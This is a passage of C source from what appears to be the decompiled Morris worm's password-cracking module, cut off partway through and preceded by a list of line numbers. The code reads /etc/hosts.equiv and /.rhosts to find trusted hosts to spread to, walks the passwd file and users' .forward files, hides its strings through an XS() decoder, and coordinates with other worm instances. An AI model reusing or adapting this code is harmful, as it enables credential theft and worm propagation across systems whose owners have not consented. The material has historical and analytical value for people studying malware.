- 001
- 002
- 003
- 004
- 005
- 006
- 007
- 008
- 009
- 010
- 011
- 012
- 013
- 014
- 015
- 016
- 017
- 018
- 019
- 020
- 021
- 022
- 023
- 024
- 025
- 026
- 027
- 028
- 029
- 030
- 031
- 032
- 033
- 034
- 035
- 036
- 037
- 038
- 039
- 040
- 041
- 042
- 043
- 044
- 045
- 046
- 047
- 048
- 049
- 050
- 051
- 052
- 053
- 054
- 055
- 056
- 057
- 058
- 059
- 060
- 061
- 062
- 063
- 064
- 065
- 066
- 067
- 068
- 069
- 070
- 071
- 072
- 073
- 074
- 075
- 076
- 077
- 078
- 079
- 080
- 081
- 082
- 083
- 084
- 085
- 086
- 087
- 088
- 089
- 090
- 091
- 092
- 093
- 094
- 095
- 096
- 097
- 098
- 099
- 100
/* Dover */
#include "worm.h"
#include <stdio.h>
#include <ctype.h>
#include <strings.h>
#include <pwd.h>
int cmode;
extern struct hst *h_name2host();
struct usr { /* sizeof(usr) == 58 */
char *name, *o4, *o8, *o12;
char passwd[14]; /* offset 16 */
char decoded_passwd[14]; /* 30 */
short pad;
char *homedir; /* offset 46 */
char *gecos; /* offset 50 */
struct usr *next; /* offset 54 */
};
/* Ahhh, I just love these names. Don't change them for anything. */
static struct usr *x27f28, *x27f2c;
/* Crack some passwords. */
cracksome()
{
switch (cmode){
case 0:
strat_0();
return; /* 88 */
case 1:
strat_1();
return;
case 2:
try_words();
return;
case 3:
dict_words();
return;
}
}
/* Strategy 0, look through /etc/hosts.equiv, and /.rhost for new hosts */
strat_0() /* 0x5da4 */
{
FILE *hosteq;
char scanbuf[512];
char fwd_buf[256];
char *fwd_host;
char getbuf[256];
struct passwd *pwent;
char local[20];
struct usr *user;
struct hst *host; /* 1048 */
int check_other_cnt; /* 1052 */
static struct usr *user_list = NULL;
hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
if (hosteq != NULL) { /* 292 */
while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
host = h_name2host(scanbuf, 0);
if (host == 0) {
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0) /* 158 */
continue;
host->flag |= 8;
}
fclose(hosteq); /* 280 */
}
hosteq = fopen(XS("/.rhosts"), XS("r"));
if (hosteq != NULL) { /* 516 */
while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
continue;
host = h_name2host(scanbuf, 0);
while (host == 0) { /* 436, 474 */
host = h_name2host(scanbuf, 1);
getaddrs(host);
}
if (host->o48[0] == 0)
continue;
host->flag |= 8;
}
fclose(hosteq);
}
/* look through the passwd file, checking for contact with others every
* tenth entry. */
setpwent();
check_other_cnt = 0; /* 522 */
while ((pwent = getpwent()) != 0) { /* 526, 1124 */
if ((check_other_cnt % 10) == 0)
other_sleep(0);
check_other_cnt++;
sprintf(fwd_buf, XS("%.200s/.forward"), pwent->pw_dir);
hosteq = fopen(fwd_buf, XS("r"));...